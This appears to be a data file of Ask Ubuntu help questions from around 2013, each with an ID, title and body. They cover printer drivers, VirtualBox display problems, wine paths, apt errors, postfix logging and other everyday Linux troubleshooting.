394620	canon lbp3100b printer = > capt driver is installed = > when i try to start ccpd , i get this : `check the devicepath of /etc/ccpd.conf`	os : ubuntu 13.10 64 bit driver : capt v2.60 - > debian package 64 bit printer : lbp3100b regarding to this `` answer '' , i 've installed the canon capt driver on my machin , but when i try to start/restart ccpd , i get the below error however , printer does n't work without starting ccpd . here is /etc/ccpd.conf contents : # canon printer daemon for cups configuration data < path > # cups configuration file path . # default /etc/cups/ cups_configpath /etc/cups/ # log directory path . # logdirectorypath /var/log/ccpd/ < /path > # printer entries . # mapping each `` printer name '' to each `` printer device port '' . # the `` printer name '' has to be identical to the cups printer queue name . # for example , if you prepare a printer named `` lbp3200 '' as a cups printer # queue name , and the printer is connected to the usb port `` /dev/usb/lp0 '' , # you can use the following three lines example just by removing the # comment symbol `` # '' of each line . # < printer lbp3200 > # devicepath /dev/usb/lp0 # < /printer > < printer lbp3100b > devicepath /dev/usb/lp0 < /printer > < ports > # status monitoring socket port . # default 59787 ui_port 59787 pdata_port 59687 < /ports > after un-commeniting logdirectorypath /var/log/ccpd/ and trying to print a page , it seems the log file is not created : ls /var/log/ccpd/ , output - > ls : can not access /var/log/ccpd/ : no such file or directory and the below picture is captured from the printer properties dialogue : and here is /var/log/cups/error_log.3.gz : w [ 20/dec/2013:20:54:08 +0330 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'lbp3100b-gray.. ' already exists w [ 20/dec/2013:20:55:35 +0330 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'lbp3100b-gray.. ' already exists e [ 20/dec/2013:20:59:55 +0330 ] [ job 2 ] ccp send_data error , exit e [ 20/dec/2013:20:59:55 +0330 ] [ job 3 ] invalid printer command `` clean '' . e [ 20/dec/2013:20:59:55 +0330 ] [ job 3 ] ccp send_data error , exit e [ 20/dec/2013:21:04:57 +0330 ] [ job 2 ] stopping unresponsive job . e [ 20/dec/2013:21:04:57 +0330 ] [ job 3 ] stopping unresponsive job . e [ 20/dec/2013:21:06:08 +0330 ] [ job 2 ] ca n't connect to ccpd : connection refused e [ 20/dec/2013:21:06:08 +0330 ] [ job 2 ] ccp send_data error , exit e [ 20/dec/2013:21:06:08 +0330 ] [ job 3 ] invalid printer command `` clean '' . e [ 20/dec/2013:21:06:08 +0330 ] [ job 3 ] ccp send_data error , exit e [ 21/dec/2013:01:06:45 +0330 ] [ job 2 ] ca n't connect to ccpd : connection refused e [ 21/dec/2013:01:06:45 +0330 ] [ job 2 ] ccp send_data error , exit e [ 21/dec/2013:01:06:45 +0330 ] [ job 3 ] invalid printer command `` clean '' . e [ 21/dec/2013:01:06:45 +0330 ] [ job 3 ] ccp send_data error , exit e [ 21/dec/2013:01:11:46 +0330 ] [ job 2 ] stopping unresponsive job . e [ 21/dec/2013:01:11:46 +0330 ] [ job 3 ] stopping unresponsive job . e [ 21/dec/2013:01:12:57 +0330 ] [ job 2 ] ca n't connect to ccpd : connection refused e [ 21/dec/2013:01:12:57 +0330 ] [ job 2 ] ccp send_data error , exit e [ 21/dec/2013:01:12:57 +0330 ] [ job 3 ] invalid printer command `` clean '' . e [ 21/dec/2013:01:12:57 +0330 ] [ job 3 ] ccp send_data error , exit e [ 21/dec/2013:01:17:58 +0330 ] [ job 2 ] stopping unresponsive job . e [ 21/dec/2013:01:17:58 +0330 ] [ job 3 ] stopping unresponsive job . e [ 21/dec/2013:01:19:09 +0330 ] [ job 2 ] ca n't connect to ccpd : connection refused e [ 21/dec/2013:01:19:09 +0330 ] [ job 2 ] ccp send_data error , exit e [ 21/dec/2013:01:19:09 +0330 ] [ job 3 ] invalid printer command `` clean '' . e [ 21/dec/2013:01:19:09 +0330 ] [ job 3 ] ccp send_data error , exit e [ 21/dec/2013:01:24:10 +0330 ] [ job 2 ] stopping unresponsive job . e [ 21/dec/2013:01:24:10 +0330 ] [ job 3 ] stopping unresponsive job . e [ 21/dec/2013:01:25:21 +0330 ] [ job 2 ] ca n't connect to ccpd : connection refused e [ 21/dec/2013:01:25:21 +0330 ] [ job 2 ] ccp send_data error , exit e [ 21/dec/2013:01:25:21 +0330 ] [ job 3 ] invalid printer command `` clean '' . e [ 21/dec/2013:01:25:21 +0330 ] [ job 3 ] ccp send_data error , exit e [ 21/dec/2013:01:30:22 +0330 ] [ job 2 ] stopping unresponsive job . e [ 21/dec/2013:01:30:22 +0330 ] [ job 3 ] stopping unresponsive job . e [ 21/dec/2013:01:31:33 +0330 ] [ job 2 ] ca n't connect to ccpd : connection refused e [ 21/dec/2013:01:31:33 +0330 ] [ job 2 ] ccp send_data error , exit e [ 21/dec/2013:01:31:33 +0330 ] [ job 3 ] invalid printer command `` clean '' . e [ 21/dec/2013:01:31:33 +0330 ] [ job 3 ] ccp send_data error , exit and ls /var/log : http : //paste.ubuntu.com/6669726
394621	no proxy setting in chromium browser	hi am using chromium browser in ubuntu with proxy settings . could you please tell me how to set no proxy setting in chrome ( just like as we do in firefox browser under advanced-network-setting-no proxy ) .
394622	third party software was not installed	i did a fresh install of ubuntugnome 13.10 . during the installation , i had checked both the options for downloading updates and installing third-party softwares . but it seems that third-party softwares are not installed . i can not play media files such as mp3 , mp4 etc . also , flash content can not be played on websites . i 'll install vlc to play media files . but , why was third-party softwares not installed ? i have a working internet connection .
394627	two ps3 controllers connected via usb identified as one	i 'm currently trying to get 2 ps3 controllers ( that are connected via usb ) to work on my ubuntu 12.04 machine . for most games this works out-of-the-box but some games such as shutter identify the two controllers as being only one . i found out that in the `` shatter-case '' the `` bus-vendor-product-version '' information that is provided by e.g . cat /proc/bus/input/devices is used to identify the gamepad ( which is identical for the both controllers ) : i : bus=0003 vendor=054c product=0268 version=0111 n : name= '' sony playstation ( r ) 3 controller '' there is a config file for shatter ( ~/.sidhe/shatter/data/profiles/default_plr_profile.xml ) that stores the information like this : < singleplayer_controller_guid > gamepad_030000004c0500006802000011010000 < /singleplayer_controller_guid > do you have any ideas how i could work around this ( maybe changing the `` product '' -id or something like that for one controller ) ?
394628	looked around a lot but ca n't avoid black screen after logging into ubuntu vm from mac 10.6 host	i 've looked at many for ideas and suggestions ( here are a few ) my computer boots to a black screen , what options do i have to fix it ? ubuntu 12.10 desktop/interface not showing on virtualbox vm after login screen how do i install guest additions in virtualbox ? can i install extra drivers via the command prompt ? i know these are of disparate topics - but i finally did succeed in installing the guest additions . to start , i have a triple boot and use the mac host mostly , so i put virtualbox to access the ubuntu partition . worked in the past but upgraded to 13.10 . actually i can log in but after that i get a black screen . i 've uninstalled cinnamon and have tried editing the boot with the nomodeset to see if i can get a graphical interace to check the drivers . even tried jockey-text . but , if i boot into the partition from refit , then everything is fine . so i 'm a little lost - any ideas ? p.s . by the way , even with the black screen i can go to a virtual terminal and log in and do stuff , but i need a desktop environment for work ( working on gui programming ; ) p.p.s . also , after trying startx , i also get a system that hangs at `` loading extension glx '' in a virtual terminal - this was mentioned in another post that i can not find right now ... .
394629	unable to get back to graphical environment after changing desktop wallpaper style to newspaper	i changed my desktop background style to `` newspaper '' and now i ca n't restore my graphical environment . i only have the kubuntu splash screen flashing and can only access command line with ctrl+f1 .
394634	how does 'telnet localhost ' work ?	i created a simple server program and connects a client to it using terminal . in the terminal window , the command telnet localhost [ port number ] was used . can anyone please tell me how this command works ? suppose i create a server via one terminal window , and can i connect a client to it using another terminal window opened in another computer , connected to internet through another router ? please tell me . thanks in advance .
394635	how to disable the animation of dimming the screen when ubuntu turns inactive screen off	when ubuntu 13.10 decides to turn of inactive screen , it runs an animation for 15 seconds long , slowly dimming the screen . the purpose , i assume , is to give an interim for human intervention - a user reading the screen can touch a key or move the mouse to brighten up the screen , preventing the turn-off . however it failed the purpose on my acer iconic w500 , where the keyboard and mouse are both locked up during dimming . the user sits sadly and helplessly waiting for the screen to dim to complete black , and then can he light it up with a mouse move or keystroke . how irritating it is to break the user away from reading a complicated article that forced him still for 10 minutes ! it may be a bug , and is perhaps filed somewhere ( a quick search did n't reveal one ) . here i am asking only for a workaround , e.g . to turn off the dimming animation . if screensaver decides to turn of the screen , let it turn it off immediately so the user can quickly wake it up , thus being less a nuisance .
394636	wifi stopped working on ubuntu 13.10	i have ubuntu 13.10 since i installed its wifi was working fine but suddenly after a reboot it has stopped working .
394639	could n't find any package by regex 'libxss.so.1	i am using ubuntu 12.04. after sudo apt-get install libxss.so.1 , taking the error could n't find any package by regex 'libxss.so.1 ' . could you help me about what to do next ?
394640	how to open an x client on a remote machine	my desktop machine has two big monitors . i would like to be able to use my laptop from my desktop . that is , i would like x clients ( say , web browsers and xterms ) on my desktop whose processes are running on my laptop . i type at my desktop , i look at my big desktop screens , but my laptop is doing the work . ( why ? different data on the two machines . ) the desktop has a name and dns entry . the laptop does not ( at least , not in any durable way ) . so the connection has to initiate from my laptop . i have tried a few combinations of ssh commands from my laptop ( the desktop can run sshd , the laptop ca n't ) , but no luck . indeed , on the desktop , netstat -a does n't show me obvious x-related connections , so i suspect it 's not just a matter of sockets . ( just to make it more fun , i sometimes have different user names on laptop and desktop . ) any suggestions how to start an xterm on the laptop such that it displays on the desktop ?
394643	is it possible to choose keyboard layout by terminal command ?	lubuntu 13.10 . keyboard model pc 105 . i have 4 keyboard layouts - ru , pl , fr , ua . is it possible to choose needed layout by command line in terminal ? command setxkbmap -layout fr not working for choosing french keyboard layout .
394646	how much space should i allocate in this step ?	yeah , finally i came to this step . it is really not easy . i already create a brand new 40gb disk for ubuntu . now installer ask me to allocate space again . what does it mean ? how about drag the line to left most ?
394647	gnome-screensaver for xscreensaver	is it safe to remove gnome-screensaver and xscreensaver ? will have any issues after removing gnome-screensaver ? i have intel® core™ i3-2350m cpu @ 2.30ghz × 4 and amd radeon hd 6300m on-board . ubuntu 12.04 lts installed .
394650	unable to connect to wireless on ubuntu 12.04	some time back my system hung following which i rebooted it . since then nm-applet does not list wireless network . it only shows wired networks . rfkill list all shows only bluetooth connection . ifconfig lists only eth0 and lo and no wlan0 . additional drivers have no info about broadcom and only show a graphics related driver . kindly help . the network controller is shown as : qualcomm atheros qca9565 / ar9565 wireless network adapter ( rev 01 )
394652	i can not pipe terminal output to file	while gnome terminal shows output of below command , it does n't pipe it out to text file xinput test 5 shows output in terminal but xinput test 5 > > text.txt does n't pipe out to file edit : '' xinput test 5 '' shows key codes of virtual keyboard . i can see output in terminal with `` xinput test 5 '' but not with `` xinput test 5 > > text.txt it shows keycodes from onboard . edit2 : i want to record keystrokes of `` onboard '' to file '' xinput test 5 '' shows the keystroke ids well in terminal but it does n't save it to file with `` xinput test 5 > > text.txt `` it also prevents showing keystroke ids in terminal . `` xinput test 5 2 > > text.txt '' shows output in terminal but does n't pipe it out to text file . edit3 : you can find virtual keyboard id with `` xinput list '' interestingly can see output in terminal with `` xinput test 5 '' but not with `` xinput test 5 > > text.txt
394653	ubuntu 64-bit `` failed to fetch file [ .. ] binary-i386/packages '' error while updating apt repos	i have the following issue on ubuntu 12.04 lts on a 64-bit machine : whenever i try to update the aptitude repos , the update will strangely fail with a i386-related error . i assume that this should n't be happening on a 64-bit system . root @ liv-hp-compaq-dc7900 : /home/liv # apt-get update ign file : apt-build release.gpg get:1 file : apt-build release [ 107 b ] ign file : apt-build/main translationindex err file : apt-build/main i386 packages file not found [ .. ] w : failed to fetch file : /var/cache/apt-build/repository/dists/apt-build/main/binary-i386/packages file not found e : some index files failed to download . they have been ignored , or old ones used instead . i tried to restore status-old with no luck : sudo cp /var/lib/dpkg/status-old /var/lib/dpkg/status i also tried : root @ liv-hp-compaq-dc7900 : /home/liv # apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 90 not upgraded . but it does n't seem to do or report anything useful . each subsequent apt-get update ends up in an error . for the record , my /etc/apt/sources.list file looks like this : # deb cdrom : [ xubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ xubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/multiverse/binary-i386/ # deb cdrom : [ xubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ xubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/universe/binary-i386/ # deb cdrom : [ xubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main multiverse restricted universe # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //nl.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //nl.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //nl.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise universe deb http : //nl.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //nl.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //nl.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //nl.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //cran.at.r-project.org/bin/linux/ubuntu precise/ # deb-src http : //cran.at.r-project.org/bin/linux/ubuntu precise/ # deb http : //archive.canonical.com/ precise partner # deb-src http : //archive.canonical.com/ precise partner and the kernel in use is : liv @ liv-hp-compaq-dc7900 : ~ $ uname -a linux liv-hp-compaq-dc7900 3.2.0-57-generic # 87-ubuntu smp tue nov 12 21:35:10 utc 2013 x86_64 x86_64 x86_64 gnu/linux what is wrong and how can i fix it ?
394656	horizon : apache exceptions at import_module	i 've deployed openstack using juju , and everything looks normal except that i can not browse to openstack-dashboard . i get error 500 internal server error . i looked through apache2 logs at that node and found these errors repeated every couple of minutes . i tried to destroy the service and deploy it on other nodes ; co-located with keystone node , then glance node , then by it self . yet i get the same errors . it looks like it needs deep python debugging which is weird since this is the typical charm deployment on a normal server . and someone must had tried to deploy this and succeeded ! i 'm deploying openstack essex version 2012.1.4-dev , ubuntu server version 13.10 , django version is : ( 1 , 5 , 4 , 'final ' , 0 ) and this is my juju status output please help me : )
394658	i do n't have `` additional drivers '' on my ubuntu ?	i searched for it in the dash but found nothing , i really need it i got ubuntu 12.04 on virtualbox on windows7
394663	limited resolution in virtualbox	i 'm using the ubuntu 12.04 lts on virtualbox and i have this problem . my resolution is locked to maximum 1280x720 ( 4:2 ) and my windows host os is running on 1920x1080 ( 16:9 ) widescreen . do i need to install some special drivers for virtualbox or update ubuntu ? specs : ati radeon hd 4800 series intel core 2 quad core cpu q9300 @ 2.50ghz ( 4 cpus ) , ~2.5ghz 6gb ram help will be much appreciated !
394665	browser is not loading pages fully	so i am using chromium and nightly broswers . as of yesterday , i am suddenly unable to visit a lot of pages . i just open the page , facebook for example . it loads almost everything and after that the whole page becomes unclickable . only way to open it again is to close the tab and re-type the address . what is wrong here ? if any additional info is needed , let me know..
394666	how to show gui of ns2 ?	i have installed ns2 ( network simulator 2.34 ) on my ubuntu 12.4 . but when i execute the ns ns-simple.tcl in the terminal only the following messages have been shown without any gui or schematic of my network : cbr packet size = 1000 cbr interval = 0.0080000000000000002 ns : finish : could n't execute `` nam '' : no such file or directory while executing `` exec nam out.nam & '' ( procedure `` finish '' line 7 ) invoked from within `` finish '' but i want to use it 's gui , can anyone help me ?
394687	terminal word navigation/deletion	i 'm a bit puzzled by the following keyboard shortcuts in ubunutu terminal : ctrl + left , ctrl + right to navigate words alt + backspace to delete entire word at the left of the cursor i 'm mainly a windows user , and i 'm accustomed to the powershell defaults for the three commands described above : ctrl + left , ctrl + right , ctrl + backspace . lately i 've been working with putty to ssh into linux machines or with mongodb shell , where the default shortcuts are : alt + left , alt + right , alt + backspace . i 've had no problem switching between the ctrl and alt-based keyword combinations so far . but the ubuntu terminal settings are a combination of the two , which is quite confusing for me . is there a way to change these settings to make them use either ctrl or alt , but not both ?
394689	executing script when email arrives	is there a way to process email upon arrival . i 've tried mailbox alert in thunderbird , the add-in executes the script although as far as i know the message ( the content of the email ) is not given to the stdin . edit : since more info was wanted i wrote a script , let 's call it script.sh that can be executed with /bin/bash . the script expects as input the content of the email ( text or html ) , and processes it ( for instance performing grep on it and storing the results in another file ) .
394693	http 500 while running .php code	i 'm trying to create a virtualbox that i can recycle across multiple projects , using a shell script to install all packages i need . i got apache2 , mysql and php5 installed regularly and running a page that contains works fine . the same for a static html fine . however , if i try to run everything else , like the server respond with a 500 error code . permission-wise , this does n't seem to be the cause and i tell you why . the user i completed the install is named vagrant and all files in the folder were owned by my logged in user . on the apache2.conf file ( envvars ) the user name and group for apache2 server is www-data as per default . i did then changed using the root user the ownership of those files to www-data setting both the group and the user to www-data , but nothing has changed since then . all the time i try to load a file that contains any php instruction i got a 500 error . looking at the error.log i get a php parse code error , syntax error , unexpected t_var in ... .. the problem persists even with a simple piece of code like < ? php t = 1 ; echo t ? > or with more complex script . googling for t_var php related issues i did n't get anything useful . i have also tried to unistall apache2 and php5 and reinstall via tasksel without success . and finally i tried to copy the php5.conf file from a running ubuntu 13.10 ( or 13.04 ) to this 12.04 lts . the result was the code being downloaded . any idea on how to solve this ? thanks andrea
394699	display going out during install	i 'm installing ubuntu from a usb stick to a blank usb and every time i go through the installation process ( whether it be through the display port of my gpu or without the gpu and straight out of the motherboard ) the screen goes completely black and my screen says no signal halfway through the installation . it happens about halfway through the `` copying files '' process . what could the problem be ? is this normal ? also , once i download ubuntu ( if i can get it to f'ing work ) , i can remove the usb stick that had the installer right ? i think i forgot to do that and every time i booted up it would proceed as if it had n't been installed but when i went to install , it asked if i wanted to overwrite the ubuntu 10.3 already on the stick . was ubuntu booting the insaller before the actual os ? thanks for the help !
394703	built in keyboard not working properly 13.10	i have a really annoying problem with my keyboard . after upgrade to 13.10 the built in keyboard on my lenovo w520 does not work as expected . some times i can not even input my password at login . what i observed is that at random points the layout seems to change , and mappings of letters on the right side of the keyboard get mapped to numbers , * , ! , ~ and so on . how to fix this ? i saw a lot of posts with similar problems , but none seemed to fix my issue . also in most of the posts people claim that in tty1 , tty2 or whatever they have correct key mapping . well that is not the case for me ! the only place where the mapping is correct is in the guest account . i hope there is some sort of fix for this , otherwise i have to move to other distribution . in my personal opinion , this things should never happen . it is not some minor issue that one can live with .
394704	how to cleanly uninstall programs ?	i just uninstalled my first program in ubuntu ( gtg - getting things gnome ) and noticed that it did n't clean after itself . it left .config/gtg and .local/share/gtg both full with configs and task info is that the norm in ubuntu ? how to cleanly uninstall programs ?
394705	double wireless icon	how can i delete this wirelles icon from my tray ? ( i 've double wireless tray icon ) .
394706	error while installing eclipse for j2ee developers ?	i 'm getting the following error while extracting the eclipse-jee-indigo-sr2-linux-gtk-x86_64.tar.gz file.here is the error msg . error message : gzip : stdin : unexpected end of file tar : unexpected eof in archive tar : unexpected eof in archive tar : error is not recoverable : exiting now
394707	syntax error . open .exe with wine	so what i wan na do is load an .exe with wine . steam.exe , cause i wan na try to install windows game . its window location is c : \program files ( x86 ) \steam\steam.exe see what i tried , and watch the learning process unfold . here comes terminal screen with my tries ... plz tell me how it should be . and tab works only on certain points or codes ? did not do anything for me : ´ ( chupacabra @ kanker-desktop : ~ $ wine c : \program files ( x86 ) \steam\steamapps\common\apb reloaded\launcher\apblauncher.exe bash : syntax error near unexpected token ` ( ' chupacabra @ kanker-desktop : ~ $ wine ¨c : \program files ( x86 ) \steam\steamapps\common\apb reloaded\launcher\apblauncher.exe bash : syntax error near unexpected token ` ( ' chupacabra @ kanker-desktop : ~ $ ^c chupacabra @ kanker-desktop : ~ $ wine ¨c : \program files ( x86 ) \steam\steamapps\common\apb reloaded\launcher\apblauncher.exe bash : syntax error near unexpected token ` ( ' chupacabra @ kanker-desktop : ~ $ wine ¨c : \program files ( x86 ) \steam\steamapps\common\apb reloaded\launcher\apblauncher.exe¨ bash : syntax error near unexpected token ` ( ' chupacabra @ kanker-desktop : ~ $ wine c : \program\ files\ ( x86\ ) \steam\steam.exe wine : can not find 'c : program files ( x86 ) steamsteam.exe' chupacabra @ kanker-desktop : ~ $ wine c : \program files\ ( x86\ ) \\steam\steam.exe wine : can not find 'c : program' chupacabra @ kanker-desktop : ~ $ wine c : \program\ files\ ( x86\ ) \\steam\steam.exe wine : can not find 'c : program files ( x86 ) \steamsteam.exe' chupacabra @ kanker-desktop : ~ $ wine c : \\program\ files\ ( x86\ ) \\steam\steam.exe wine : can not find 'c : \program files ( x86 ) \steamsteam.exe' chupacabra @ kanker-desktop : ~ $ c : \\program\ files\ ( x86\ ) \\steam\\steam.exe c : \program files ( x86 ) \steam\steam.exe : command not found chupacabra @ kanker-desktop : ~ $ wine c : \\program\ files\ ( x86\ ) \\steam\\steam.exe wine : can not find 'c : \program files ( x86 ) \steam\steam.exe' chupacabra @ kanker-desktop : ~ $ c : \program files ( x86 ) \steam\steam.exe bash : syntax error near unexpected token ` ( ' chupacabra @ kanker-desktop : ~ $ wine c : \\program\ files\ ( x86\ ) \\steam\\steam.exe wine : can not find 'c : \program files ( x86 ) \steam\steam.exe' chupacabra @ kanker-desktop : ~ $ wine ¨c : \\program\ files\ ( x86\ ) \\steam\\steam.exe¨ wine : can not find '�c : \program files ( x86 ) \steam\steam.exe�' chupacabra @ kanker-desktop : ~ $ wine ¨c : \\program\ files\ ( x86\ ) \\steam\\steam . wine : can not find '�c : \program files ( x86 ) \steam\steam . ' chupacabra @ kanker-desktop : ~ $ wine ´c : \\program\ files\ ( x86\ ) \\steam\\steam.exe´ wine : can not find '�c : \program files ( x86 ) \steam\steam.exe�' chupacabra @ kanker-desktop : ~ $ wine ¨c : //program/ files/ ( x86/ ) //steam//steam.exe¨ bash : syntax error near unexpected token ` ( ' chupacabra @ kanker-desktop : ~ $ ^c chupacabra @ kanker-desktop : ~ $
394708	can not plot graph in gnuplot-x11	i am using gnuplot under ubuntu 12.04 . when i type in terminal : terminal type set to 'unknown' gnuplot > plot sin ( x ) it only shows next step : gnuplot > but it does n't show the graph plotting windows . what can i do to find the problem ? i have already installed gnuplot-x11 . it is showing that the latest version is installed . thanks in advance .
394709	ambiance theme was deleted /missing from ubuntu 13.10 . how to re-intall default theme ?	i must have done something wrong . i un-installed nginx and php-fpm using apt-get purge . when i did a reboot , the theme changed from ambiance to high contrast . also the audacious player is also gone . the ambiance theme is not available anymore from the settings . how can i get the ambiance theme back ? thanks . i am using ubuntu 13.10 . i hate the high contrast theme .
394712	zte mf190 does not connect on ubuntu 12.04 lts	am using ubuntu 12.04 lts and am failing to connect my modem zte mf190.though it allows me to install in network manager ... .
394722	beginner need help after shrink mistake	i have a raid5 created with mdadm and over it i have created one lvm volume group with 3 logical volume on it . there is a few weeks i have shrink the larger logical volume to give more space to another one . i have increased the filesystem on the small one but i have totally forgot to reduce de filesystem on the big one . all was running fine in fact but i have discovered my mistake now because of a power failure . now when i try to reboot , i have got a error saying '' unexpected inconsistency ; run fsck manually ... . '' on that logical volume ( /dev/linuxraid5/lr5-stockage ) . when i try to run e2fsck , it tell me an error that the filesystem size is bigger than the physical size . it say that either superblock or partition table is likely to be corrupt ... and if i try to run resize2fs to reduce the filesystem , it tell me that i first need to run e2fsck oo i also tried to run e2fsck -f but i have one million of error saying it ca n't inode since last exam . i am totally lost nut i do n't want to lost all my data , i know there are fine since before the power failure all was fine ( only 300g used on 3.5to ) . how can i solve this ?
394724	where are the postfix log files ?	i know this has been asked a hundred times . but i 've done a lot of google searching without success . my question : i want to log every activity of my postfix server . neither the default file /var/log/mail nor any other concerning mail or postfix exists . what 's the exact string to put into the configuration file /etc/postfx/main.cf to enable logging ? where can i see which configuration file postfix uses ? ( according to my hint below ) thanks for your answers . hint : i use postfix together with dovecot . i installed meta package some months ago . output for postconf -n : alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix home_mailbox = maildir/ inet_interfaces = all mailbox_command = /usr/lib/dovecot/deliver -c /etc/dovecot/conf.d/01-dovecot-postfix.conf -n -m `` $ { extension } '' mailbox_size_limit = 0 mydestination = mydomain.de localhost myhostname = mydomain.de mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 myorigin = /etc/mailname readme_directory = no recipient_delimiter = + smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtp_use_tls = yes smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_recipient_restrictions = reject_unknown_sender_domain , reject_unknown_recipient_domain , reject_unauth_pipelining , permit_mynetworks , permit_sasl_authenticated , reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_authenticated_header = yes smtpd_sasl_local_domain = $ myhostname smtpd_sasl_path = private/dovecot-auth smtpd_sasl_security_options = noanonymous smtpd_sasl_type = dovecot smtpd_sender_restrictions = reject_unknown_sender_domain smtpd_tls_auth_only = yes smtpd_tls_cert_file = /etc/ssl/certs/ssl-mail.pem smtpd_tls_key_file = /etc/ssl/private/ssl-mail.key smtpd_tls_mandatory_ciphers = medium smtpd_tls_mandatory_protocols = sslv3 , tlsv1 smtpd_tls_received_header = yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_use_tls = yes tls_random_source = dev : /dev/urandom virtual_alias_maps = hash : /etc/postfix/virtual virtual_gid_maps = static:5000 virtual_mailbox_base = /var/mail/vhosts virtual_mailbox_domains = mydomain2.de virtual_mailbox_maps = hash : /etc/postfix/vmailbox virtual_minimum_uid = 100 virtual_uid_maps = static:5000 output for /etc/syslog.conf # /etc/syslog.conf configuration file for syslogd . # # for more information see syslog.conf ( 5 ) # manpage . # # first some standard logfiles . log by facility . # auth , authpriv . * -/var/log/auth.log * . * ; auth , authpriv.none ; local0.none ; local1.none -/var/log/syslog # cron . * -/var/log/cron.log daemon . * -/var/log/daemon.log kern . * -/var/log/kern.log lpr . * -/var/log/lpr.log user . * -/var/log/user.log # # logging for the mail system . split it up so that # it is easy to write scripts to parse these files . # # logging for inn news system # news.crit -/var/log/news/news.crit news.err -/var/log/news/news.err news.notice -/var/log/news/news.notice # # some `catch-all ' logfiles . # *.=debug ; \ auth , authpriv.none ; \ news.none -/var/log/debug *.=info ; *.=notice ; *.=warning ; \ auth , authpriv.none ; \ cron , daemon.none ; \ mail , news.none -/var/log/messages # # emergencies are sent to everybody logged in . # *.emerg * # # i like to have messages displayed on the console , but only on a virtual # console i usually leave idle . # # daemon , mail . * ; \ # news.=crit ; news.=err ; news.=notice ; \ # *.=debug ; *.=info ; \ # *.=notice ; *.=warning /dev/tty8 # the named pipe /dev/xconsole is for the `xconsole ' utility . to use it , # you must invoke `xconsole ' with the `-file ' option : # # $ xconsole -file /dev/xconsole [ ... ] # # note : adjust the list below , or you 'll go crazy if you have a reasonably # busy site.. # daemon.* ; mail . * ; \ news.err ; \ *.=debug ; *.=info ; \ *.=notice ; *.=warning |/dev/xconsole
394726	is there an advanced-power-manager with bandwidth monitoring for ubuntu ? ( like on synology ? )	like this one : a powerful power management application subsuming synology diskstation 's integrated one and enabling the administrator to perform automatic on-demand power up and shut down of the diskstation , based on simple rules . it also enables to derogate to a program , typically by allowing hibernation to occur ( typically used when leaving home for the vacations ) , suspend the current schedule until told you ( typically used when performing administration tasks ) , but also shut down the diskstation conditionally , typically once network or disk activity are below a given threshold ( typically used when streaming videos or music to a tv or performing a backup to an external disk ) . '' i 'm switching from synology to ubuntu and would be really glad to have such application on ubuntu .
